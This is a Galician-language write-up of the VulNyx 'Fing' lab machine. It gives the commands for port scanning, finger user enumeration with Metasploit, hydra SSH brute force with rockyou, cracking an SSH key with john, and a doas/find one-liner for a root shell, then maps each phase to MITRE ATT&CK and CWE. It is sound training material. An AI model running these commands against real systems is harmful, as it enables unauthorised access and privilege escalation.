Ir ao contido

Doc vulnyx fing

Máquina virtual Fing

Fig. VulNyx Fing
Fig. Card VulNyx Fing

A máquina Fing é moi interesante porque...

  • Servizo finger (porto 79) para enumeración de usuarios
  • Uso de Metasploit para enumerar usuarios mediante finger
  • Ataque de forza bruta SSH con SecLists
  • Escalada horizontal mediante busybox con sudo
  • Abuso de doas (equivalente OpenBSD de sudo) con find

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Fing -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Fing # buscar portas (p.ex. 22,79)
whatweb IP_VulNyx_Fing
curl -I IP_VulNyx_Fing

Fase 2 — Análise

# Enumeración con módulo Metasploit para finger
msfconsole -q
> use auxiliary/scanner/finger/finger_users
> set RHOSTS IP_VulNyx_Fing
> run # Atopamos usuarios expostos polo servizo finger

# Complementar coa comprobación web / servizos descubertos
whatweb IP_VulNyx_Fing
curl "http://IP_VulNyx_Fing/" -s | sed -n '1,120p'

Fase 3 — Explotación

# Se atopamos un usuario válido (p.ex. 'service' ou 'admin') probamos forza bruta a SSH
hydra -l usuario_encontrado -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ssh://IP_VulNyx_Fing -t 64

# Se se obtén acceso por SSH:
ssh usuario_encontrado@IP_VulNyx_Fing # Conseguimos consola de usuario (flag user)

# Alternativa: se atopamos claves privadas no sistema remoto (p.ex. vía finger / ficheiros expostos)
# recuperámola e atacámola offline como no exemplo Doctor
ssh2john id_rsa > id_rsa.hash && john -w:/usr/share/wordlists/rockyou.txt id_rsa.hash
chmod 400 id_rsa && ssh -i id_rsa usuario@IP_VulNyx_Fing

Fase 4 — Post-explotación

Subimos linpeas.sh para enumerar privilexios e configuracións fráxiles

# Enumeración local
uname -a
id
hostnamectl
sudo -l           # buscamos comandos con NOPASSWD
find / -perm -4000 -type f 2>/dev/null | xargs ls -l

# Exemplos de explotación local que poderían devolver root:
# 1) Doas / sudo mal configurado
cat /etc/doas.conf
# 2) Ficheiros con SUID executables explotables
find . -type f -perm -4000 2>/dev/null | xargs ls -l

# Usando doas (se existe e é vulnerable / mal configurado)
# (exemplo adaptado; non execute sen comprender)
touch 1.txt && doas /usr/bin/find . -type f -exec /bin/bash \; # obter consola root (flag root)

Correspondencia de fases → MITRE ATT&CK — VulNyx: Fing

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery
CWE-200 — Information Exposure (reconnaissance)
2. Análise Enumeración de usuarios mediante servizo finger Enumeración de contas / servizo finger T1087 — Account Discovery
T1592 — Gather Victim Host Information
CWE-200 — Information Exposure; CWE-359 — Exposure of Private Personal Information
3. Explotación Ataque de forza bruta contra SSH con hydra Brute-force de credenciais T1110.001 — Brute Force: Password Guessing
T1110.002 — Brute Force: Password Cracking
CWE-521 — Weak Password Requirements; CWE-307 — Improper Restriction of Excessive Authentication Attempts
Acceso SSH con credenciais válidas Uso de contas válidas T1078 — Valid Accounts
T1021.004 — Remote Services: SSH
CWE-798 — Use of Hard-coded Credentials (contextual)
4. Post-explotación Enumeración de binarios SUID e análise de doas.conf Discovery local / enumeración de permisos T1083 — File and Directory Discovery
T1069 — Permission Groups Discovery
T1615 — Group Policy Discovery
CWE-732 — Incorrect Permission Assignment for Critical Resource